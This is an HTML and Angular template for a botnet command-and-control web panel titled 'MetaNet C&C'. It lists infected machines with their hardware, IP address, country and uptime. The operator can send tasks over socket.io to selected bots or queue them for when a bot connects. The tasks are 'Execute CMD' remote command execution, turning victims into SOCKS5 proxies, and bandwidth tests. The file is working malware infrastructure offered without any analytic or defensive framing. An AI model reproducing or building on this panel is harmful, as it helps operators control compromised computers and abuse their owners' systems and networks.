<!DOCTYPE HTML>
<html ng-app="botsApp">
<head>
    <title>MetaNet C&C</title>

    <link href="static/dialogs.min.css" rel="stylesheet" type="text/css"/>
    <link href="static/bootstrap.min.css" rel="stylesheet" type="text/css"/>
    <link href="static/datatables.bootstrap.css" rel="stylesheet" type="text/css"/>
    <link href="static/socket.css" rel="stylesheet" type="text/css"/>
    <script src="static/jquery-2.1.4.min.js"></script>

    <script type="text/javascript" src="static/socket.io-1.3.7.min.js"></script>

    <script src="static/jquery.dataTables.min.js"
            type="text/javascript"></script>
    <script src="static/dataTables.bootstrap.min.js"></script>
    <script src="static/angular-1.5.0-rc.0.min.js"
            type="text/javascript"></script>
    <script src="static/angular-sanitize.min.js"
            type="text/javascript"></script>
    <script src="static/dialogs.min.js"
            type="text/javascript"></script>
    <script src="static/angular-animate.min.js" type="text/javascript"></script>
    <script src="static/angular-datatables.min.js" type="text/javascript"></script>

    <script src="static/ng-contextmenu.min.js" type="text/javascript"></script>

    <link href="static/menu/menu.css" rel="stylesheet" type="text/css"/>

    <script src="static/ui-bootstrap-tpls-0.14.3.min.js" type="text/javascript"></script>
    <script type="text/javascript" charset="utf-8">
        'use strict;';
        var app = angular.module('botsApp', ['ui.bootstrap', 'ngAnimate', 'ngContextMenu', 'datatables', 'dialogs.main']);

        app.controller('taskDialog', function ($scope, $uibModalInstance, data) {
            $scope.data = data;
            $scope.params = {};
            $scope.done = function () {
                $uibModalInstance.close($scope.params);
            };
            $scope.cancel = function () {
                $uibModalInstance.dismiss('Canceled');
            };
            $scope.hitEnter = function (evt) {
                if (angular.equals(evt.keyCode, 13) && !(angular.equals($scope.params, {}) || angular.equals($scope.params, {}))) ///fix
                    $scope.save();
            };
        });


        function secondsToDHM(seconds) {
            var days = parseInt(seconds / (60 * 60 * 24));
            seconds = seconds % (60 * 60 * 24);
            var hours = parseInt(seconds / (60 * 60));
            seconds = seconds % (60 * 60);

            var minutes = parseInt(seconds / 60);
            return days + "d " + hours + "h " + minutes + "m";
        }


        app.filter('secondsToDHM', function () {
            return function (seconds) {
                return secondsToDHM(seconds);
            }
        });

        app.filter('relative_time', function () {
            return function (epoch) {
                var parsed_date = new Date(parseInt(epoch) * 1000);
                var relative_to = (arguments.length > 1) ? arguments[1] : new Date(); //defines relative to what ..default is now
                var delta = parseInt((relative_to.getTime() - parsed_date) / 1000);
                delta = (delta < 2) ? 2 : delta;
                return secondsToDHM(delta) + " ago";
            }
        });

        app.filter('last_seen', function () {
            return function (last_seen) {
                var i = Math.round(+new Date() / 1000) - parseInt(last_seen);
                return i + " seconds ago";
            }
        });

        app.factory('socket', function () {
            var socket = io.connect('http://' + document.domain + ':' + location.port + '/socket');
            return socket;
        });

        app.controller('botsController', function ($scope, socket, $timeout, DTOptionsBuilder, DTColumnBuilder, dialogs) {
            $scope.bots = [];
            $scope.tasks = [
                {'id': 1, 'name': 'Execute CMD', "img": "sand3.png", "parameters": ["CMD"]},
                {'id': 2, 'name': 'SOCKS5', "img": "bird30.png", "parameters": ["Port"]},
                {
                    'id': 3,
                    'name': 'Bandwidth test',
                    "img": "bird30.png",
                    "parameters": ["Download link", "Parallel connections"]
                }
            ];
            $scope.headers = {
                'ID': 'id',
                'Version': 'version',
                'OS': 'os_version',
                'CPU': 'cpu',
                'Memory': 'memory',
                'GPU': 'gpu',
                'First seen': 'first_seen',
                'Last seen': 'last_seen',
                'Uptime': 'uptime',
                'Last IP': 'last_ip',
                'Country': 'country'
            };

            $scope.selectedTask = $scope.tasks[0];
            $scope.selectedTask1 = $scope.tasks[0];
            $scope.parseInt = parseInt;
            $scope.isCollapsed = true;

            $scope.dtOptions = DTOptionsBuilder.newOptions().withPaginationType('full_numbers').withOption('bInfo', false).withOption('bDestroy', true);
            $scope.dtColumns = [];
            $scope.dtInstance = {};
            $scope.getOnConnectTasks = function () {
                socket.emit('task:on_connect_list');
            };

            socket.on('task:on_connect_list', function (on_connect_tasks) {
                console.log(on_connect_tasks);
                $scope.on_connect_tasks = angular.fromJson(on_connect_tasks);
                for (var i = 0; i < $scope.on_connect_tasks.length; i++) {
                    console.log($scope.on_connect_tasks[i].id);
                }
            });

            $('#search').keyup(function () {
                $scope.dtInstance['dataTable'].fnFilter($(this).val());
            });

            for (key in $scope.headers) {
                $scope.dtColumns.push(DTColumnBuilder.newColumn($scope.headers[key]).withTitle(key));
            }

            socket.on('connect', function (data) {
                console.log('connected to socket.');
            });

            $scope.proxy = function () {
                console.log('menu test');
            };

            socket.on('bot:signOfLife', function (bot) {
                var found = false;
                bot = angular.fromJson(bot);
                for (var i = 0; i < $scope.bots.length; i++) {
                    if ($scope.bots[i].id == bot.id) {
                        console.log('bot signOfLife.');
                        found = true;
                        $scope.bots[i].last_seen = bot.last_seen;
                    }
                }
                if (!found) {
                    console.log('bot connected.');
                    $scope.bots.push(bot);

                    //console.log(bot)
                }
                $scope.dtInstance.rerender();
            });

            socket.on('bot:list', function (botlist) {
                console.log('bot list received.');
                $scope.bots = angular.fromJson(botlist);
                $scope.dtInstance.rerender();
                //$scope.$digest();
            });

            /*
            $scope.intervalFunction = function () {
                $timeout(function () {
                    var newlist = [];
                    console.log('Removing disconnected bots.');
                    for (var i = 0;
                         i < $scope.bots.length; i++) {
                        //console.log(parseInt($scope.bots[i]['last_seen']) + 61);
                        //console.log(Math.round(+new Date() / 1000));
                        if (parseInt($scope.bots[i]['last_seen']) + 35 >= Math.round(+new Date() / 1000)) {
                            newlist.push($scope.bots[i]);
                        }
                    }
                    $scope.bots = newlist;
                    $scope.intervalFunction();
                }, 30000)
            };


            $scope.intervalFunction();
             */
            $scope.launch = function (which, task, onconnect) {
                switch (which) {
                    case 'error':
                        dialogs.error();
                        break;
                    case 'wait':
                        var dlg = dialogs.wait(undefined, undefined, _progress);
                        _fakeWaitProgress();
                        break;
                    case 'notify':
                        dialogs.notify();
                        break;
                    case 'confirm':
                        var dlg = dialogs.confirm();
                        dlg.result.then(function (btn) {
                            $scope.confirmed = 'You confirmed "Yes."';
                        }, function (btn) {
                            $scope.confirmed = 'You confirmed "No."';
                        });
                        break;
                    case 'taskDialog':
                        var dlg = dialogs.create('static/dialogs/task.html', 'taskDialog', {'task': task}, {
                            size: 'sm',
                            keyboard: true,
                            backdrop: false,
                            windowClass: 'my-class'
                        });
                        dlg.result.then(function (params) {
                            $scope.params = params;
                            console.log($scope.params);

                            var filteredBots = $scope.dtInstance['dataTable']._('tr', {"filter": "applied"});
                            var ids = [];
                            for (var i = 0; i < filteredBots.length; i++)
                                ids.push(filteredBots[i].id);

                            if (onconnect) {
                                socket.emit('task:onconnect', {
                                    'task_id': parseInt(task.id),
                                    'params': $scope.params
                                });
                            }
                            else {
                                socket.emit('task:send', {
                                    'task_id': parseInt(task.id),
                                    'params': $scope.params,
                                    'bots': ids
                                });
                            }

                        }, function () {
                            if (angular.equals($scope.name, ''))
                                $scope.name = 'You did not enter in your name!';
                        });
                        break;
                }
            };


        });

    </script>

</head>
<body>
{% block body %}
{% include 'menu.html' %}
<div ng-controller="botsController">
    <form>
        <div class="row">
            <div class="col-md-offset-2 col-md-8">
                <div class="panel panel-primary">
                    <div class="panel-heading">
                        <h3 class="panel-title">Tasks panel</h3>
                    </div>
                    <div class="panel-body">
                        <div class="form-group">
                        <span>Bots connected: {{bots.length|angular}}</span><br>
                        </div>
                        <div class="row form-group">
                            <div class="col-sm-1">
                                <button type="button" class="btn btn-default"
                                        ng-click="isCollapsed = !isCollapsed;getOnConnectTasks()">+
                                </button>
                            </div>
                            <div class="col-sm-2">
                                <label for="task_onconnect">On bot connect</label>
                            </div>
                            <div class="col-sm-3">
                                <select class="form-control" id="task_onconnect" ng-model="selectedTask1"
                                        ng-options="task.name for task in tasks">
                                </select>
                            </div>
                            <div class="col-sm-2">
                                <input class='btn btn-info btn-sm' type="submit" id="task_onconnect_send"
                                       ng-click="launch('taskDialog',selectedTask1,true)"
                                       value="Add task"/></div>
                        </div>
                        <div uib-collapse="isCollapsed">
                            <div class="well well-lg">
                                <span ng-repeat="task for task in on_connect_tasks">{{task.id|angular}}</span>
                            </div>
                        </div>
                        <div class="row form-group">
                            <div class="col-sm-2">
                                <label for="search">Filter</label>
                            </div>
                            <div class="col-sm-3">
                                <input class="form-control input-sm" type="text" id="search" ng-model="filterText">
                            </div>
                            <div class="col-sm-2">
                                <label for="tasks">Task (to filtered)</label>
                            </div>
                            <div class="col-sm-2">
                                <select class="form-control" id="tasks" ng-model="selectedTask"
                                        ng-options="task.name for task in tasks">
                                </select>
                            </div>
                            <div class="col-sm-2">
                                <input class='btn btn-info btn-sm' type="submit" id="send_tasks"
                                       ng-click="launch('taskDialog',selectedTask,false)"
                                       value="Send task"/></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <table id="bots" datatable="ng" dt-options="dtOptions" dt-columns="dtColumns" dt-instance="dtInstance"
               class="table table-striped row-border hover">
            <tbody>
            <tr class="fade1" data-context-event="contextmenu" data-context-menu="static/menu/menu.html" ng-model="bot"
                ng-repeat="bot in bots">
                <td>{{bot.id |angular}}</td>
                <td>{{bot.version |angular}}</td>
                <td>{{bot.os_version |angular}}</td>
                <td>{{bot.cpu |angular}}</td>
                <td>{{"parseInt(bot.memory)/1024|number:2" |angular}}</td>
                <td>{{bot.gpu |angular}}</td>
                <td>{{"bot.first_seen|relative_time" |angular}}</td>
                <td>~{{bot.last_seen | angular}}s ago</td>
                <td>{{"bot.uptime|secondsToDHM" |angular}}</td>
                <td>{{bot.last_ip |angular}}</td>
                <td><img ng-src="static/icons/flags/{{" bot.country|lowercase"|angular}}.png" title="{{ bot.country
                    |angular}}">
                </td>
            </tr>
            </tbody>
        </table>
    </form>
</div>
{% endblock %}
</body>
</html>